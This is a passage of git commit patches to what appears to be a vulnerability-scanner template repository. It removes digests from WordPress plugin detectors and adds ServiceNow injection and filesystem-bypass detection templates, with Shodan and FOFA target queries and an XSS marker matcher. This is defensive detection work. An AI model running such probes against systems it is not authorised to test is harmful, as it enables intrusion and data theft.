100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c83107b4dfad6114f54dd4d892cd05f28f908c59448f857f6461456991c197d022100b2f6c39dd076a79ffb194e8b1adbff7b34c33eee3c2eae4b1616fe2d248d2a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f25ec120a0..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0eebadf8b2adcc377296bacab46dfb8112a58fb4f97c299c284bc7615fab51e0220782881cab6f4112463714a5da7ad803286b382b9c921b6da30266c3b07fd5ec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 92d2a1e82a..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100922778079cce903cabc2cb290333c920c8b7996c5d1803d58280b06d1acc388d022100de2235b9c1492e9c9650eacef31abf6a392f3688dce0b328267d929cb66b7855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 71bf00763d..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2be633d9abc487755d7ddfe461867f1d08c43766d68f9d17ca62c2eaa9e88e8022030423560e94ce4d19f6e8526503dc6440b461080de75e24d615fa1a3b05e5686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fa7c190b4d..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089554f8f3fb67164c36fc320a486bcea8ea19b28bfd02c93d0c9dec2c728cfeb022100cd1f82b0747312e90fff873728219f8cb0e714a0e1e0b8960fda1ef43e3ec0f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 63160cc442..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220079f1182fde2e0d9e1e86ce8f0eae179064c795e285cc440ba6f49cb3091df51022100c51b2fa96188d631a2799c553ee56d0cac6b22b18a15c8e5fbef6f0677d6f661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 8f405e9ff6..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f9efea9a299f231a68a2560f55fa0f2dfb6f9c3a962ff58d5f15af42e2befff022014b8c6d7899f71c3a9b90d2459163146c06b2d57d3bccc46ea80121c33b93e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 3560ece294..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed379ba66ced620a755e0f62d753bc88ff1b61f5cbd1ec7160907d92fbac007f0220217cd734bebdb2f821d1b9b6611628a5f05d83beba84297884ecbd50a1788da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c5ec0ed0f7..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100825094f226c62f2004cfa592a07809dcafe56df399b1ca1525f64f8e40f71fb402210087af4f1deb6ab28732cf7c4b645cc6f899a2c45b30f7e2631d34ae5bb3f1bcca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index b956ba5218..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a3aa28122c563585602b13d9e836fa24a58362fce6cd6c49fc0ccc23727bfef02207bdd25881d93bb7758d530051fd72231c222241bf9062080abb37807b8b72d9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 61fa7557cf..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203fec15ea84c7411a08f4d6839a1b7e75151d8946feb25079225883c36be461a302204f6f3ad5cc950305b91cf55c6433419502eeeee6e992eb0a8b2c9b6fdc07c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 4b47b9cfa3..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091777a51292d214376f2a52dd89175568a96c4a703f7288b292404634cfbe908022044bfa993e5eb9aa37863393f85a26ee046e26ae96135b38eef6bc3be5062346e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 725a62c032..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec4429a9c3ca80eb737cd8a3bafda682f245d1df33d8566ab80b42147834e620022003df917327acf63db661be360c792f0602b5a631b107228a96ba24ab169e8905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 9d697511cf..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dda6393c24b1fe49835a83e4647103db26ec7b11763fa9f8fae7725e3af4fe6d0220106636e521aad9efd3c294826c88603ba7716ad74ccb04a11364922a5ec3988c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index e2933289cb..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8f15d42c5160ee1b5ac249df0123c8f41367d1cada9bad692457bcbdea018c4022100ca13ba5ed04f84f58d1bfdaa9f3bde23a99a8e351291c9490d1e40a3794bd63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 6d71b0e7dd..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086a3aa6270dd4f10754e2cb11a7e27c785a85c490bd43586466b48e976f4233e022067a3fc2aa6969c3bf11afbbd0793b99ff8b9642152737bff3b2fbea82f88adb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 1ba50d9c69..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4eb5e20a3f18c6a950652ca5fd7765bb18aa85e877f6082b6a2f3d16b03d050022034c1a1516cc5152ef7099fb033283a1918e602d96204bf4412802c6716399ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 20a3667caf..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7c944c93171309f1c47411347021ed82d75a4ad525414a98dcab7815dcd6b7b022060fc61974b13f947db13c83f7df5b6eefaf3d0e73dcb113df1e3037bb62eb135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 654e7ca8a8..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a547bf37b50b1e560ecb54022eaef44f9a540e67c9634e3604f50c2f5fc6e580022052dc1c411e225d8a5c20e040c1783786c734ff79e3b4ad6d0b4eaae584e728f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3fb4de072abead7852e03055ce316c04c5258eb1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 11 Jul 2024 07:53:56 +0700 Subject: [PATCH 1107/1841] Rename CNVD-2021-64035.yaml to CNVD-2021-64035.yaml --- http/cnvd/{2024 => 2021}/CNVD-2021-64035.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/cnvd/{2024 => 2021}/CNVD-2021-64035.yaml (99%) diff --git a/http/cnvd/2024/CNVD-2021-64035.yaml b/http/cnvd/2021/CNVD-2021-64035.yaml similarity index 99% rename from http/cnvd/2024/CNVD-2021-64035.yaml rename to http/cnvd/2021/CNVD-2021-64035.yaml index 01aae7b786..08d1875a34 100644 --- a/http/cnvd/2024/CNVD-2021-64035.yaml +++ b/http/cnvd/2021/CNVD-2021-64035.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950 From d73c530c3bdf22a9460f5a7a04060c1c6641993a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Jul 2024 11:34:04 +0530 Subject: [PATCH 1108/1841] Fix FP CVE-2023-35161.yaml --- http/cves/2023/CVE-2023-35161.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 4fc0f733c1..702f0126ae 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -43,6 +43,7 @@ http: words: - 'javascript:alert(document.domain)' - 'DeleteApplication' + - 'data-xwiki' condition: and - type: word @@ -54,4 +55,4 @@ http: status: - 200 - 401 -# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 From 4be9df7a2a6839d238b303b7f4fb06317aea3432 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:03:16 +0530 Subject: [PATCH 1109/1841] Create servicenow-title-injection.yaml --- .../servicenow-title-injection.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 http/misconfiguration/servicenow-title-injection.yaml diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml new file mode 100644 index 0000000000..19cec8bdd1 --- /dev/null +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -0,0 +1,19 @@ +id: servicenow-title-injection + +info: + name: Service Now - Title Injection + author: DhiyaneshDk + severity: high + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<style><foo>abc</foo></style>' From 9723a8da6a5986339674b9e016a6f35a46e23ed5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:04:11 +0530 Subject: [PATCH 1110/1841] Create servicenow-ssti.yaml --- http/misconfiguration/servicenow-ssti.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 http/misconfiguration/servicenow-ssti.yaml diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml new file mode 100644 index 0000000000..a13e8f3d8a --- /dev/null +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -0,0 +1,20 @@ +id: servicenow-ssti + +info: + name: Service Now - Template Injection Mitigation Bypass + author: DhiyaneshDk + severity: high + + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
    49
    ' From 91796a0662fb0ef614de7dafdcf05e412ce60a5a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:04:51 +0530 Subject: [PATCH 1111/1841] fix lint --- http/misconfiguration/servicenow-ssti.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml index a13e8f3d8a..b296cd8177 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -5,13 +5,12 @@ info: author: DhiyaneshDk severity: high - http: - raw: - | GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From dfdc32e3a1947c1835ba39847bd59e9fc58a8f7c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:18:03 +0530 Subject: [PATCH 1112/1841] Create servicenow-filesystem-bypass.yaml --- .../servicenow-filesystem-bypass.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 http/misconfiguration/servicenow-filesystem-bypass.yaml diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml new file mode 100644 index 0000000000..13c1ab80ca --- /dev/null +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -0,0 +1,19 @@ +id: servicenow-filesystem-bypass + +info: + name: Service Now - Filesystem Filter Bypass + author: DhiyaneshDk + severity: high + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'db.user' From 20cb50d9f3104c9e48b855b2b62b9aa9489b695a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:43:50 +0530 Subject: [PATCH 1113/1841] minor-update --- .../servicenow-filesystem-bypass.yaml | 32 +++++++++++++++++-- 1 file changed, 29 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml index 13c1ab80ca..77ef0440cd 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -4,16 +4,42 @@ info: name: Service Now - Filesystem Filter Bypass author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,rce http: - raw: - | - GET /login.do?jvar_page_title= HTTP/1.1 + GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word part: body words: - - 'db.user' + - "glide.db.user" + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 7871d3c2957f3c025e4836c77dbf3a6e93c015b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:44:32 +0530 Subject: [PATCH 1114/1841] minor update --- http/misconfiguration/servicenow-ssti.yaml | 26 ++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml index b296cd8177..e6b547a56f 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -4,6 +4,23 @@ info: name: Service Now - Template Injection Mitigation Bypass author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,ssti http: - raw: @@ -17,3 +34,12 @@ http: part: body words: - '
    49
    ' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 054c42c8cf1ca490df88e2f933814879f4b5dab8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:45:32 +0530 Subject: [PATCH 1115/1841] minor update --- .../servicenow-title-injection.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index 19cec8bdd1..f1957d4b6f 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -4,6 +4,23 @@ info: name: Service Now - Title Injection author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,injection http: - raw: @@ -17,3 +34,12 @@ http: part: body words: - '<style><foo>abc</foo></style>' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 36aff773733b7a6573b23e4334cc2341034da216 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:48:08 +0530 Subject: [PATCH 1116/1841] fix-trail-space --- http/misconfiguration/servicenow-filesystem-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml index 77ef0440cd..ff155f4152 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -27,7 +27,7 @@ http: - | GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From f8d0ba3a785d17b115d6f4fe1d24b768dfdc0afe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:22:02 +0000 Subject: [PATCH 1118/1841] Auto Generated Templates Checksum [Thu Jul 11 07:22:02 UTC 2024] :robot: --- templates-checksum.txt | 430 ++++++++++++++++++++--------------------- 1 file changed, 215 insertions(+), 215 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6936b1d38a..5b3ffd1130 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -737,7 +737,7 @@ helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d helpers/wordpress/plugins/admin-menu-editor.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 -helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb +helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de @@ -792,7 +792,7 @@ helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd9 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:4a75639c283b56053860c27e1607b76f949fbb7a helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa -helpers/wordpress/plugins/facebook-for-woocommerce.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 +helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce @@ -800,7 +800,7 @@ helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd3 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 -helpers/wordpress/plugins/forminator.txt:6ee02b82336e55125a24970b177a069b10306436 +helpers/wordpress/plugins/forminator.txt:0b6a16f2a55e024ce70078ac1af9191ccab9fc42 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c @@ -826,7 +826,7 @@ helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea1019 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c -helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b +helpers/wordpress/plugins/jetpack-boost.txt:0378155bec7f85b13304474a2e6dc6c7797689bc helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 helpers/wordpress/plugins/kadence-blocks.txt:ff9c051b520ac807402f74294d9ef63ab68c6b88 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d @@ -868,19 +868,19 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/premium-addons-for-elementor.txt:e95d97da8a2ce341d64e208ea599b9a4c7584ef9 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:d45042d6a26130a25d35761ed77b4b0bc720ab44 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:7bed2a141156e4ba7df86140b29e73a2f48c1f0a +helpers/wordpress/plugins/royal-elementor-addons.txt:d23cb39919efcacdfc1a634287181ffd084f7d0f helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 -helpers/wordpress/plugins/seo-by-rank-math.txt:5bf51483cdbf6af88985eb92aeb46c696e503716 -helpers/wordpress/plugins/sg-cachepress.txt:04035664301b06859586cb750fd8f8ad988856ea +helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d5268bae +helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 -helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea +helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 